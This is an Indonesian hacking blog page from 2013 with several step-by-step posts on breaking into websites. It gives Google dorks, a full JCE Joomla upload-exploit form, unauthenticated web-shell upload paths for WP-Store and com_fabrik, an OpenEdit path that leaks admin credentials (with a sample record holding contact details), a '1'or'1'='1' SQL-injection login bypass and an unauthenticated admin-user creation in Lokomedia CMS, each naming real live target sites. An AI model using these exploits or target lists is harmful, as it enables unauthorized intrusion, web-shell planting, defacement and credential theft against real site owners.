Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Exploit WP-STORE | Upload Vulnerability

Minggu, 12 Mei 2013
Posted by Unknown
0 Comments
Tag : ,
+
Assalamualaikum
Salam itu baik lho :P
Dan wajib hukumnya menjawab salam, yang gak jawab maho >,<

Dork :
inurl:/wp-content/themes/WPstore/

  1. WPStore
  2. eShop
  3. KidzStore
  4. Emporium
  5. Store
  6. eCommerce
  7. framework
  8. frameworkold
Theme bisa diganti [ganti pada bagian belakangnya itu lho]

1. Googling dengan menggunakan salah satu dork itu
2. Kalo udah ketemu tambahin /upload/ setelah path tema
[ex : http://localhost/wp-content/themes/framework/upload/]
3. Silakan upload ditempat itu, bisa berupa
php , txt , html , dll
4. Akses di mari
http://localhost/wp-content/uploads/products_img/shell.php 

Live Target :
 http://www.lacasadelcromo.es/
Description: Exploit WP-STORE | Upload Vulnerability
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Exploit WP-STORE | Upload Vulnerability

Exploit JCE Joomla Extension | Upload Vulnerability

Posted by Unknown
0 Comments
Tag : ,
+
Assalamualaikum , saya Sandy-x207 mau share Exploit JCE nih
Oke langsung TKP !

Copas dulu script ini,

<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type"text/css">
body {
background:#e1e1e1;
font-family: orbitron;
padding:4;
width:98%;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
#header {
color:#00FF00;
text-align:center;
text-shadow:1px 2px 3px #0000FF;
font-size:30px;
}
.tablenya{
}
.atas1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 0 0 0;
-moz-border-radius: 6px 0 0 0;
border-radius: 6px 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 6px 0 0;
-moz-border-radius: 0 6px 0 0;
border-radius: 0 6px 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.tengah1 {
width:30%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
width:50%;
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 0 0;
-moz-border-radius: 0 0 0 0;
border-radius: 0 0 0 0;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.required {
text-align:right;
color:#FF0000;
position:fixed;
right:3%;
}
input {
font-size:18px;
font-weight:bold;
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 6px 6px 6px 6px;
-moz-border-radius: 6px 6px 6px 6px;
border-radius: 6px 6px 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
color:#FF0000;
}
.start {
text-align:center;
color:#FF0000;
}
#footer {
background-color: #e1e1e1;
border: 1px solid #050505;
-webkit-border-radius: 0 0 6px 6px;
-moz-border-radius: 0 0 6px 6px;
border-radius: 0 0 6px 6px;
*zoom: 1;
-webkit-box-shadow: inset 0 1px 0 #ffffff;
-moz-box-shadow: inset 0 1px 0 #ffffff;
box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }
#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data" method="post">
<table class="tabelnya">
<tr>
<td class="atas1">hostname (ex:www.sitename.com):</td>
<td class="atas2"><input name="host" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">path (ex: /joomla/ or just / ):</td>
<td class="tengah2"><input name="path" size="90"> *</td>
</tr>
<tr>
<td class="tengah1">Please specify a file to upload:</td>
<td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
</tr>
<tr>
<td class="tengah1">specify a port (default is 80):</td>
<td class="tengah2"><input name="port" size="90"></td>
</tr>
<tr>
<td class="tengah1">Proxy (ip:port):</td>
<td class="tengah2"><input name="proxy" size="90"></td>
</tr>
</table>
<div id="footer">
<div class="required">*fields are required</div>
<br>
<div class="start"><input type="submit" value="Start" name="Submit"></div>
<br>
</div>
</form>
<div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// hilangkan overlay dengan efek .fadeOut() jika keseluruhan halaman telah selesai dimuat
$(window).bind("load", function() {
$("#loading-overlay").fadeOut();
});
</script>
</body></html>



Dork :
inurl:index.php?option=com_jce
 1.  Simpan dalam ekstensi php lalu upload ke website [mau website mana kek terserah :p]



2. Masukan Dork Ke Google

3. Keluar tuh Banyak Website, Coba 1-1 yah :D , Tapi Saya Disini Sudah Punya Live Target
www.saintpatricktemuco.cl

4. Masukan Url Site nya Ke " hostname (ex:www.sitename.com): " ,
Contoh : www.saintpatricktemuco.cl ( tanpa http:// dan / )

5. Di Path : path (ex: /joomla/ or just / ):
Contoh : www.site.com/joomla/ ( Untuk Path bisa gunakan /joomla/ atau kalau di website tidak mempunyai path bisa gunakan / saja )

6. Pilih shell yang ingin kalian upload

7. Klik Start !

8. Akses di localhost/images/stories/shell.php

Source : Arsyad-Cyber
Description: Exploit JCE Joomla Extension | Upload Vulnerability
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Exploit JCE Joomla Extension | Upload Vulnerability

Deface Exploit Openedit

Sabtu, 13 April 2013
Posted by Unknown
0 Comments
Tag :
+
Ketemu Lagi Dengan Ane Daffa-x207 :)
Langsung Aja :v

[#] Dorknya : 

Code:
inurl:openedit/authentication/

[#] Exploitnya :

Code:
/openedit/files/download/WEB-INF/users/admin.xml

langsung saja gak usah banyak bacot lagi ..
kita langsung masuk step by step cara defacenya .. 
kalo berhasil deface , jangan lupa cendol 

========
[#] Step 1 
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap

========
[#] Step 2 
========
- Pilih salah satu target digoogle tadi
Example : http://mcdev.openedit.com/

========
[#] Step 3
========
- Masukan Exploitnya Tadi 
jadinya kek gini ni : 
http://mcdev.openedit.com/openedit/files/download/WEB-INF/users/admin.xml

========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi

========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi 

<?xml version="1.0" encoding="UTF-8" ?> 
- <user enabled="true">
  <user-name>admin</user-name> 
  <password>DES:en9gFy2YMf0=</password> 
  <creation-date>1145462580187</creation-date> 
- <properties>
  <property name="billingAddress1" value="kj" /> 
  <property name="billingAddress2" value="kllkj" /> 
  <property name="Phone1" value="512-788-6787" /> 
  <property name="addresslist" value="my house,Home" /> 
  <property name="TaxRate" value="0.0000" /> 
  <property name="billingState" value="LKJ" /> 
  <property name="ship2State" value="5" /> 
  <property name="BillingState" value="SOME STATE" /> 
  <property name="AllowEmail" value="false" /> 
  <property name="my houseAddress1" value="home street" /> 
  <property name="showopenjobs" value="false" /> 
  <property name="homeCity" value="sadf" /> 
  <property name="my houseCountry" value="USA" /> 
  <property name="showjobsearch" value="false" /> 
  <property name="ship2Country" value="5" /> 
  <property name="billingCity" value="lkj" /> 
  <property name="firstName" value="Admin" /> 
  <property name="billingCountry" value="klj" /> 
  <property name="Company" value="The Administrator" /> 
  <property name="BillingAddress1" value="adress line 1" /> 
  <property name="lastName" value="User" /> 
  <property name="BillingCountry" value="USA" /> 
  <property name="HomeCity" value="Cincinnati" /> 
  <property name="HomeCountry" value="USA" /> 
  <property name="oe.edit.mode" value="preview" /> 
  <property name="HomeState" value="OH" /> 
  <property name="ship2Address2" value="2" /> 
  <property name="homeCountry" value="sadf" /> 
  <property name="ship2Address1" value="3" /> 
  <property name="HomeAddress1" value="5052 Gray Rd" /> 
  <property name="ship2City" value="1" /> 
  <property name="openadmintoolbar" value="true" /> 
  <property name="showcategoryselection" value="false" /> 
  <property name="BillingCity" value="somewhere" /> 
  <property name="showassetmanager" value="false" /> 
  <property name="email" value="jvalencia@openedit.org" /> 
  <property name="failedlogincount" value="0" /> 
  <property name="showfilter" value="false" /> 
  <property name="homeState" value="SDF" /> 
  <property name="homeAddress2" value="sadf" /> 
  <property name="homeAddress1" value="fdsa" /> 
  <property name="showtodosearch" value="false" /> 
  <property name="showbasket" value="false" /> 
  <property name="HomeZipCode" value="45232" /> 
  </properties>
  <group id="greenbaydie" /> 
  <group id="administrators" /> 
  <group id="honda" /> 
  <group id="orderers" /> 
  </user> 


========
[#] Step 5
========
- Nah Tu Udah keliatan Pass adminnya 
Langsung Aja Deh Login Kesini 
http://mcdev.openedit.com/openedit/filemanager


========
[#] Step 6
========
- Done , Mision Selesai 
 Tgl Oprek Sesuka Hati<password>DES:en9gFy2YMf0=</password>

Passwordnnya Yang warna Merah Gak Perlu Di Apa2in Lagi Langsung Login
Description: Deface Exploit Openedit
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Deface Exploit Openedit

AdminLogin.asp Bug Lama ^_^

Posted by Unknown
0 Comments
Tag :
+
Halo Ketemu Lagi Ama Ane Daffa-x207 :)

Langsung Aja 

Buka Google.com

Masukin Dorknnya : inurl:"/AdminLogin.asp"

Klik Salah Satu 

Login Dengan Ini : 

Username : 1'or'1'='1
Password : 1'or'1'='1

Klik Login Tarra Udah Masuk Seterah Mau Diapain :v

Live Demo : 
-http://www.quickwrench.com/Admin/adminlogin.asp
-http://www.ringjordan.com/AdminLogin.asp
-http://www.sunmarytrust.org/adminlogin.asp
-http://www.adyar.net/Adminlogin.asp
-http://polyprodw.trafficpullz.info/adminlogin.asp
-http://www.preventivecardiology.in/adminlogin.asp

NB : Di Kembangin Dorknnya :)
Description: AdminLogin.asp Bug Lama ^_^
Rating: 4.5
Reviewer: Unknown
ItemReviewed: AdminLogin.asp Bug Lama ^_^

Exploit Joomla COM_FABRIK | Upload Vulnerability

Sabtu, 23 Maret 2013
Posted by Unknown
0 Comments
Tag : ,
+
Bismillahirrahmanirrahim

Assalamualaikum sobat 207cs, apa kabarnya nih ? maaf ya jarang update, lagi asik liburan soalnya. kwkwkwk

     Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]
inurl:index.php?option=com_fabrik
 2. Ceritanya kita sudah mendapat si target
http://ar.librodar.com.ar/index.php?option=com_fabrik
3. Maka pastekan Vulnerable path nya di belakang Url, Vulnerable path nya adalah ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Maka akan jadi seperti ini
http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe
php,asp,html,jpg
6. Sudah ? nah sekarang kita akses shellnya di
http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan

Wabillahittaufiq Wassalamualaikum Warahmatullahiwabarokatuh
Description: Exploit Joomla COM_FABRIK | Upload Vulnerability
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Exploit Joomla COM_FABRIK | Upload Vulnerability

Bug CMS Lokomedia News

Minggu, 17 Maret 2013
Posted by Unknown
0 Comments
Tag :
+
Selamat Weekend Sobat 207CS , ketemu lagi dengan Ane Daffa-x207

kali ini ane mau posting BUG CMS LOKOMEDIA :D langsung disimak ya :P

Langkah Langkah :

1.) Masukan Dork Di www.google.com / www.bing.com


DORK :

inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita



2.) pilih salah satu target ente, misalkan disini target ane adalah http://www.tiketdiskon.net/media.php?module=home



3.) lalu kita ubah URL dari Web tadi itu gan :D dengan mengubahnya / menambahkan setelah alamat web target tersebut denagn injeksi dibawah ini gan :D


Injeksi : /admin/content.php?module=user

#Sebelumnya : http://www.tiketdiskon.net/media.php?module=home



#Sesudah : http://www.tiketdiskon.net/admin/content.php?module=user




4.) Setelah itu klik tambah user, lalu isikan form terserah ente gan lalu klik simpan :P






5.) Setelah itu tinggal login deh di Admin Panelnya :D

http://www.tiketdiskon.net/admin/


6.) Horeee :P Ane udah login di web tersebut gan :D wkwkkw



Sekian dari Saya

Thanks To : Katonz | Surabaya Blackhat
Description: Bug CMS Lokomedia News
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Bug CMS Lokomedia News
Welcome to My Blog

Popular Post

Labels

Followers

- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -